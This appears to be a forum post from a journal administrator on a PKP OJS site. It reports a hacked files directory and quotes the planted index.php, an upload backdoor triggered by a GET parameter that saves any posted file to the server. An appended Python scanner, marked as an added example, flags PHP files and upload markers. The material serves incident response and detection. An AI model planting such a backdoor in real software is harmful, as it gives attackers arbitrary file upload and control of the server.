Problem: FILE folder hacked.
Hello, yesterday I found it was not possible to upload files to galleys (HTTP error). I was looking for the reason (server error log, PHP setup… fileopen was enabled). Consequently I found it is not possible to access published articles in the present issue and in archived issues too. Consequently I looked in the FILE folder and found the problem. The default article folder was renamed. There was an index.php file with the following script:
…
<?php
if(isset($_GET['?blankkosong'])) {
    echo " ";
    echo "";
    if ($_FILES["file"]["upload"] > 0) {
        echo " " . $_FILES["file"]["upload"] . "
";
    } else {
        echo " " . $_FILES["file"]["name"] . "
";
    }
    if (file_exists("" . $_FILES["file"]["name"])) {
        echo $_FILES["file"]["name"] . " already exists ";
    } else {
        move_uploaded_file($_FILES["file"]["tmp_name"], "" . $_FILES["file"]["name"]);
    }
}
?>
…
Is it a security problem related to our server or is it a PKP OJS problem (we are using the last version)?
We have the file folder located outside the installation folder.
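
A check an administrator could run over the files directory after an incident like the one described above, added here as an example and not part of the original post or of OJS: it lists every PHP-like file under a directory and notes which upload-handling markers from the quoted script each one contains. The extension list, the sample tree built in `demo()`, and the premise that a files directory should hold no PHP scripts at all are assumptions.

```python
"""List PHP-like files under a storage directory and flag upload-handling code."""
import os
import re
import sys
import tempfile

# Extensions a web server may pass to PHP (assumed list; match it to your handler config).
PHP_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Markers taken from the script quoted in the post above.
MARKERS = (b"move_uploaded_file", b"$_FILES", b"$_GET")


def scan(root):
    """Return sorted (relative_path, [markers found]) for each PHP-like file under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not PHP_EXT.search(name):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(1 << 20)  # the first 1 MiB is plenty for a small script
            except OSError:
                data = b""  # unreadable files are still reported, with no markers
            hits = [m.decode() for m in MARKERS if m in data]
            findings.append((os.path.relpath(path, root), hits))
    return sorted(findings)


def demo():
    """Scan a constructed tree: one PDF and one index.php in a renamed folder."""
    with tempfile.TemporaryDirectory() as root:
        folder = os.path.join(root, "journals", "1", "articles_renamed")  # hypothetical layout
        os.makedirs(folder)
        with open(os.path.join(folder, "index.php"), "wb") as fh:
            # Constructed sample, not the script from the post.
            fh.write(b'<?php move_uploaded_file($_FILES["file"]["tmp_name"], "x"); ?>')
        with open(os.path.join(root, "journals", "1", "galley.pdf"), "wb") as fh:
            fh.write(b"%PDF-1.4 constructed sample")
        return scan(root)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    for rel, hits in (scan(target) if target else demo()):
        print(f"{rel}\tmarkers={','.join(hits) or 'none'}")
```

Run it with the files directory as its only argument; any line of output is a file to inspect, and files without markers still deserve a look because the directory is assumed to hold no PHP.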